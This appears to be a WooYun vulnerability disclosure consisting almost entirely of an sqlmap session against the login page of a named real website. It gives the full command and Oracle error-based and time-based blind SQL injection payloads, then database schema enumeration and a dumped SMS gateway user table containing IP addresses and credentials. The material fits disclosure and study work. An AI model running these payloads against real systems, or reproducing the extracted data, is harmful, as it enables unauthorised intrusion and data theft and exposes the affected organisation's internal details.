WooYun.org

sqlmap -u "http://www.186online.com/usermanager/login.do" --data="autologin=true&passWord=g00dPa%24%24w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1" -p "userName"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: userName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: autologin=true&passWord=g00dPa$$w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1' AND 3000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(114)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (3000=3000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(109)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'GWgd'='GWgd
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: autologin=true&passWord=g00dPa$$w0rD&Submit232=%c2%a0%b5%c7%c2%bc%c2%a0&userName=1' AND 7996=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UjGl'='UjGl
---
[00:40:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[00:40:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[00:40:54] [INFO] fetching database (schema) names
[00:40:55] [INFO] the SQL query used returns 27 entries
[00:40:56] [INFO] retrieved: BILLSEND
[00:40:57] [INFO] retrieved: COMMON
[00:40:58] [INFO] retrieved: CTXSYS
[00:40:59] [INFO] retrieved: DBSNMP
[00:41:00] [INFO] retrieved: DMSYS
[00:41:01] [INFO] retrieved: DOCTOR_HENAN
[00:41:02] [INFO] retrieved: EMAIL
[00:41:04] [INFO] retrieved: EXFSYS
[00:41:06] [INFO] retrieved: FENGJY
[00:41:07] [INFO] retrieved: GROWSMS
[00:41:09] [INFO] retrieved: ITMUSER1
[00:41:11] [INFO] retrieved: MDSYS
[00:41:11] [INFO] retrieved: MICROBLOG
[00:41:12] [INFO] retrieved: OLAPSYS
[00:41:13] [INFO] retrieved: ORDSYS
[00:41:15] [INFO] retrieved: OUTLN
[00:41:15] [INFO] retrieved: SIGN
[00:41:16] [INFO] retrieved: SMSUSER
[00:41:18] [INFO] retrieved: SYS
[00:41:19] [INFO] retrieved: SYSMAN
[00:41:20] [INFO] retrieved: SYSTEM
[00:41:21] [INFO] retrieved: TIVOLI
[00:41:21] [INFO] retrieved: UNICOM_ALL
[00:41:23] [INFO] retrieved: WKSYS
[00:41:23] [INFO] retrieved: WK_TEST
[00:41:24] [INFO] retrieved: WMSYS
[00:41:24] [INFO] retrieved: XDB
Database: SMSUSER
Table: SMS_GATEWAY_USER
[2 entries]
+-------------------------+----------+-----------------------+------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------+-----------+-----------+-------------+--------------+
| GW_ID                   | IS_GW_ID | BABILITY              | ADD_TIME         | CLIENT_IP                                                                                                                     | PASS_WORD | IS_ACTIVE | USER_NAME | IS_BABILITY | IS_CLIENT_IP |
+-------------------------+----------+-----------------------+------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------+-----------+-----------+-------------+--------------+
| hn_tele_combox_b2b_1001 | close    | gwmo-gwmt-appmt-appmo | 11-1\xd4\xc2 -10 | 112.94.162.157-211.147.251.59-58.248.253.73-220.196.52.101-211.96.27.169-192.168.10.171-58.248.253.88-192.168.10.88-127.0.0.1 | testpwd   | active    | testuser  | open        | open         |
| hn_tele_combox_b2b_1001 | close    | gwmo-gwmt             | 10-12\xd4\xc2-09 | 112.94.162.157                                                                                                                | testpwd   | active    | testusr   | close       | close        |
+-------------------------+----------+-----------------------+------------------+-------------------------------------------------------------------------------------------------------------------------------+-----------+-----------+-----------+-------------+--------------+